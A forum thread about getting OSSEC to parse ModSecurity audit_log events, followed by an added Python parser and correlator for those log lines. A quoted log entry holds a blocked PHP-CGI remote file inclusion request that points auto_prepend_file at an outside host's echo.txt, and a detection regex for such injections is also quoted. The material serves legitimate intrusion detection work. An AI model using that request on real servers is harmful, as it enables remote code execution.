Ossec Log Format for audit_log?
I've searched and searched but can't seem to find the correct log format to use for monitoring audit_log with Ossec.
<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>
I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?
- Atomicorp Staff - Site Admin
Re: Ossec Log Format for audit_log?
Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
Re: Ossec Log Format for audit_log?
scott wrote: "Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format."
Thanks, I am.
Re: Ossec Log Format for audit_log?
Is "apache" the correct log format?
This is what I get reported in Ossec notifications:
OSSEC HIDS Notification.
2013 Sep 19 09:07:53
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.
--END OF NOTIFICATION
OSSEC HIDS Notification.
2013 Sep 19 09:08:01
Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):
[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.
--END OF NOTIFICATION
- mikeshinn
- Atomicorp Staff - Site Admin
Re: Ossec Log Format for audit_log?
Yes, "apache" is correct. This error:
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Means your ossec rules don't have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).
Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.
Michael Shinn
Atomicorp - Security For Everyone
Re: Ossec Log Format for audit_log?
Here are the mod_security rules included in my apache_rules.xml:
<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>
<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>
<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>
<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>
Re: Ossec Log Format for audit_log?
After reviewing the rules I just posted, the match phrases seem to be incorrect for the way audit_log has things worded.
Do I have the wrong Ossec rules or the wrong audit_log format?
- mikeshinn
- Atomicorp Staff - Site Admin
Re: Ossec Log Format for audit_log?
Wrong or old ossec rules.
Michael Shinn
Atomicorp - Security For Everyone
Re: Ossec Log Format for audit_log?
I have the latest Ossec 2.7 with rules installed from ossec.net. They do list getting it directly from the AtomiCorp repository, however my monitoring server is an AWS and not compatible with "RPMs for RHEL, CentOS, Fedora and others". I used Server 2.7 – Linux/BSD download instead.
http://www.ossec.net/?page_id=19
Would that make a difference?
- mikeshinn
- Atomicorp Staff - Site Admin
Re: Ossec Log Format for audit_log?
It certainly could. The other problem you're going to have with the ossec rules you posted is that they don't recognize modsecurity levels, and will treat all modsecurity events the same, which means you'll also end up blocking lower level rules (suspicious or just informational rules, as opposed to actual attacks).
Michael Shinn
Atomicorp - Security For Everyone
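The two points made above (the posted apache_rules.xml only matches "mod_security: Access denied", which never appears in the bracketed audit_log lines, and those rules ignore the [severity "..."] tag, so every ModSecurity event is escalated the same way) are easier to see with a small parser. The following is an added example, not OSSEC code and not Atomicorp's ASL rules: it tokenises the single-line audit_log format quoted in the thread, reads the timestamp out of the audit entry path, maps the ModSecurity severity name to an OSSEC-style level, and then applies the same frequency/timeframe idea as rule 30119 (six denials from one source IP within 120 seconds) only to events at or above a chosen level. The severity-to-level mapping, the thresholds and the sample lines are assumptions constructed for illustration.

```python
"""Parse single-line ModSecurity audit_log events and escalate repeated
high-severity denials per source IP.  Added example: not OSSEC code and not
Atomicorp's rules.  Field names follow the sample lines in the thread; the
severity-to-level mapping, thresholds and sample events are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime

# One bracketed token: optional key, then either a "quoted value" (with \" escapes)
# or a bare value running up to the closing bracket.
TOKEN = re.compile(
    r'\[(?P<key>[A-Za-z_]+)?\s*(?:"(?P<quoted>(?:[^"\\]|\\.)*)"|(?P<bare>[^\]]*))\]'
)
# The audit entry path is the only timestamp on the line: .../YYYYMMDD-HHMMSS-<id>
ENTRY_TIME = re.compile(r"/(\d{8})-(\d{6})-")

# Assumed mapping from ModSecurity severity names to OSSEC-style alert levels (0-15).
SEVERITY_LEVELS = {"EMERGENCY": 14, "ALERT": 13, "CRITICAL": 12, "ERROR": 9,
                   "WARNING": 7, "NOTICE": 5, "INFO": 3, "DEBUG": 1}
DEFAULT_LEVEL = SEVERITY_LEVELS["NOTICE"]  # for events that carry no [severity] tag


def parse_audit_line(line):
    """Return a dict of bracketed fields plus the trailing free-text message."""
    event, positional, pos = {}, [], 0
    while True:
        m = TOKEN.match(line, pos)
        if not m:
            break
        key = m.group("key")
        value = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        if key is None:
            positional.append(value)                    # [403] and the entry path
        elif value == "":
            event.setdefault("tags", []).append(key)    # [modsecurity]
        else:
            event[key] = value.replace('\\"', '"')      # client, id, msg, severity, ...
        pos = m.end()
        if line.startswith(" ", pos):
            pos += 1
    event["message"] = line[pos:].strip()               # "Access denied with code 403 ..."
    for p in positional:
        if p.isdigit():
            event["status"] = int(p)
        elif (t := ENTRY_TIME.search(p)):
            event["timestamp"] = datetime.strptime("".join(t.groups()), "%Y%m%d%H%M%S")
    return event


def event_level(event):
    """OSSEC-style level for an event; unlabelled events get the default level."""
    return SEVERITY_LEVELS.get(event.get("severity", "").upper(), DEFAULT_LEVEL)


class DenialCorrelator:
    """Frequency/timeframe rule like 30119, restricted to events >= min_level."""

    def __init__(self, frequency=6, timeframe=120, min_level=SEVERITY_LEVELS["CRITICAL"]):
        self.frequency, self.timeframe, self.min_level = frequency, timeframe, min_level
        self.history = defaultdict(deque)   # client ip -> timestamps of qualifying denials

    def feed(self, line):
        """Return an alert dict when a client crosses the threshold, else None."""
        ev = parse_audit_line(line)
        if "Access denied" not in ev["message"] or event_level(ev) < self.min_level:
            return None                     # informational or non-blocking: do not escalate
        if "client" not in ev or "timestamp" not in ev:
            return None
        q = self.history[ev["client"]]
        q.append(ev["timestamp"])
        while (ev["timestamp"] - q[0]).total_seconds() > self.timeframe:
            q.popleft()                     # drop denials outside the sliding window
        if len(q) >= self.frequency:
            count = len(q)
            q.clear()                       # a new alert needs another full window
            return {"srcip": ev["client"], "count": count, "last_rule_id": ev.get("id")}
        return None


def make_denial_line(client, stamp, rule_id, severity=None, msg="Example rule"):
    """Build a constructed audit_log line in the thread's format (stamp: YYYYMMDD-HHMMSS)."""
    day, hm = stamp[:8], stamp[9:13]
    parts = ["[modsecurity]", f"[client {client}]", "[domain example.com]", "[403]",
             f"[/{day}/{day}-{hm}/{stamp}-CONSTRUCTEDID]",
             '[file "/etc/httpd/modsecurity.d/example.conf"]', '[line "1"]',
             f'[id "{rule_id}"]', '[rev "1"]', f'[msg "{msg}"]']
    if severity:
        parts.append(f'[severity "{severity}"]')
    return " ".join(parts) + ' Access denied with code 403 (phase 2). Pattern match "x" at REQUEST_URI.'


# Constructed sample events: one unlabelled user-agent block (stays at the default
# level) and six CRITICAL denials from one address within a few seconds.
SAMPLE_LINES = [make_denial_line("198.51.100.7", "20130919-090800", "309925",
                                 msg="Suspicious User-Agent, parenthesis closed with a semicolon")]
SAMPLE_LINES += [make_denial_line("203.0.113.5", f"20130919-0907{51 + i:02d}", "340165",
                                  severity="CRITICAL", msg="Possible Remote File Injection attempt in URI")
                 for i in range(6)]


def run_demo(lines=None):
    """Feed lines through the correlator; return (parsed events, alerts raised)."""
    corr, events, alerts = DenialCorrelator(), [], []
    for line in SAMPLE_LINES if lines is None else lines:
        events.append(parse_audit_line(line))
        alert = corr.feed(line)
        if alert:
            alerts.append(alert)
    return events, alerts


if __name__ == "__main__":
    for ev in run_demo()[0]:
        print(ev.get("client"), ev.get("id"), ev.get("severity", "-"), event_level(ev))
    print(run_demo()[1])
```

Run as-is it prints one line per parsed event with its derived level, then a single alert for 203.0.113.5; the user-agent event is parsed (client, id, status, timestamp all recovered) but never counted because it carries no severity. The same split is what the ASL rule set does inside OSSEC: a decoder pulls the fields out, and per-rule OSSEC rules decide which ModSecurity rule ids and severities are worth active response.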